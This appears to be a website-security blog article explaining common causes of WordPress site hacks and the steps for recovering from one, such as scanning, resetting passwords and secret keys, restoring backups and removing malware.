Has your WordPress website ever been hacked? If you have been hacked, your first questions are how and why. In this article we will help you understand and give you answers so you can prevent it from ever happening again.
It is important to note that WordPress websites aren’t the only websites that are being hacked, many websites are vulnerable to hacking attacks. However, WordPress is the most attacked because it is the most popular website builder all over the world. WordPress being the most popular gives hackers a good and easy chance to find websites that are less secure. Hackers have different intentions, some are just beginners who are learning to exploit the less secure website, whereas some hackers have more malicious intentions like distributing malware using a website to attack other websites or spamming the internet.
Top causes why WordPress Sites are being hacked
Insecure Web Hosting
Like many websites, WordPress website is hosted on a Web server. Some websites get hacked because the hosting platform is not secure, which leaves the website vulnerable to hacking attempts. This can be avoided by choosing a secure and reliable hosting provider that is recommended by WordPress. It is very important that you look into how secure the server really is as it is your first line of defense and could prevent many common attacks on WordPress sites.
Use of weak passwords
Having a strong password is very important for the safety of your website. Having weak passwords could allow hackers to easily crack the password and have complete access to your website. There are many passwords that are used for a website such as your WordPress Admin account password, FTP password, MySQL database password and email accounts passwords and it is critical that you use a unique strong password for each login. You can consider using an online password generator that uses special characters like #2$&*/>@? mixed with numbers and letters.
Unprotected access to WordPress Admin
WordPress admin area allows a person to have access to the website and perform actions on the WordPress website. Leaving it unprotected gives hackers a chance to try different approaches to hack your site. It is very important to protect your WordPress admin area giving it double protection. It is highly recommended that you to create two-way authentication to your WordPress Admin Directory.
Not Updating WordPress
It is very important to update your WordPress. Most users can be very scared to do this in fear that it could possibly break the site. Every new version of WordPress fixes bugs and security vulnerabilities. Should you decide not to update your WordPress then you will be leaving your website vulnerable to attacks.
Not Updating Plugins or Themes
Updating your security plugins and themes is just as important as updating your WordPress.
Using an outdated plugin can make your site vulnerable to attacks. Most security flaws are usually discovered through plugins and themes, even though the plugin authors are quick to pick them up and fix them.
Using FTP instead of SFTP/SSH
FTP accounts are used to upload files onto your web server. When you connect using FTP, your password is then sent to the server unencrypted allowing it to be spied on easily and stolen. Using SFTP/SSH as your protocol is more secure and highly recommended you use these options to keep your site safe.
Using ‘Admin’ as a WordPress Username
Using ‘Admin’ as your user name is not recommended as that could be easily guessed. It is advisable that you change the password to something unique that can’t be easily figured out.
Steps to take when your website is hacked
Indicators that your website has been hacked
- Google has blacklisted your website
- Your host has disabled your website
- Your website has been flagged for distributing malware
- Users complaining that their Anti-Virus is flagging your site
- You can see that your website has been hacked in the browser
- Notice new users being created
1. Remain Calm
Getting your website hacked can be one of the most stressful online experiences anybody can go through. Yes, it might affect your brand, you might lose some money, but you can most definitely recover from this – all is not lost. It is best to take a step back and compose yourself so you can effectively take full control of the situation and recover your online presence
2. Create a document
It is always best to create a document that has full details on what you are experiencing that is leaving you to believe you have been hacked. Below are some points to take down in the documentation:
- What are you seeing that makes you believe you are hacked?
- What time did you first notice you have been hacked?
- What are the latest actions taken recently? Plugins installed? Theme change? Password change etc.
Whether you are planning to perform the incident response yourself or through a professional organisation, this document will prove valuable over time.
3. Scan your website
You have different ways you can do this, you can install security plugins such as Securi, Wordfence, Aw-snap, VirusTotal and many more, or you can scan your website using external remote scanners or application-based. Each of the scanners works differently and report on different things. You do get WordPress recommended security plugins that have strong communities behind them and have been around a long time.
4. Scan your local environment
In addition to scanning your website, it is important to scan your local desktop and laptop because some hackers run trojans locally in search of login information like FTP or wp/admin passwords to allow them to log in. Some viruses can detect an anti-virus on your local machine and are very good at hiding from them, so make sure you choose an Anti-virus that is able to detect any viruses, this applies to all Windows, OS X and Linux machines.
5. Check with your hosting provider
The hack may have affected more than just your website, especially on shared hosting. You can call your hosting company in case there are any steps they are taking, they might be able to point out if your website has been hacked or if it was just a loss of service. In most cases, hacked websites are email blacklisted as websites are used to send out SPAM emails. The best thing you can do to solve this issue is to look at email providers like Google Apps when it comes to your business.
6. Be mindful of Website Blacklists
Google Blacklist can cause great harm to your brand. Website blacklisting is increasing, every day 9500 to 10 000 websites are being blacklisted. There are many types of warning such as splash warning pages and pop-ups. It is highly recommended that you register your website with a various online webmaster console like:
- Google Search Console
- Bing Webmaster
- Norton Webmaster
- Yandex Webmaster
7. Improve your access controls
When we say access control, we mean your FTP, WP_ADMIN, CONTROL PANEL and MySQL. It is important to use strong, unique and complicated passwords, as well as regularly changing all your passwords to ensure that nobody can access your website. It is also highly recommended to use a Two-Way/Multi-Factor authentication system which introduces a second form of security.
8. Reset all Access
Once you have identified the hack, the first and most important thing is to lock down all possible access anybody may have by changing the passwords. The first place to start is with your WordPress users. You can do this by using forcing global passwords resets for all users which will log out all possible users. You can do this by updating the secret keys in wp-config, you will need to create a new set her: the WordPress key generator, you can then take these values and replace them in your wp-config.php file with the new ones.
9. Create a Backup
It is very important to have a backup of your website, if you don’t already, create one. You can always also ask your hosting provider what their policy is when it comes to backups. It is very important to always have a backup of your website, database and files. You can also install plugins into your WordPress website that you can set up to back up your website in a certain period.
10. Remove the hack
This can be a very painful process, how you plan on approaching the process is also determined by your own technical aptitude working with websites and web servers.
Here are some sites to help you through the process:
- Did Your WordPress Site Get Hacked?
- How to Clean Your Hacked Install
- How To Clean a Hacked WordPress Site
- How to Cope With a Hacked Site
- Four Malware Infections
- How to Clean a WordPress Hack
Other steps to take when removing the hack:
- Restore files and database either from the compromised version or from your hosting company.
- Log in and update all plugins first, then update WordPress.
- Manually delete any malware files that the hosting company’s scan may have picked up.
- Install security plugins.
- Remove any malicious files that these scanners pick up. Consider advice that those plugins give.
- Change all Passwords including Admin, FTP passwords, MySQL, wp-config.php file with new details
- Install Duplicator and make a backup of the site for emergency purposes.
Many websites get hacked every day, that’s why it is very important that you have as much security on your website to prevent it and reduce the possibility of hurting your online brand image. Most hacking attempts are due to moments of opportunity, 51% of WordPress sites are hacked because of themes and plugins, and 8% is caused by Weak passwords and the rest is caused by weak hosting company security. You can prevent website hacks by avoiding default credentials, enabling two-factor authentication, using SSL and opting for a secure hosting server.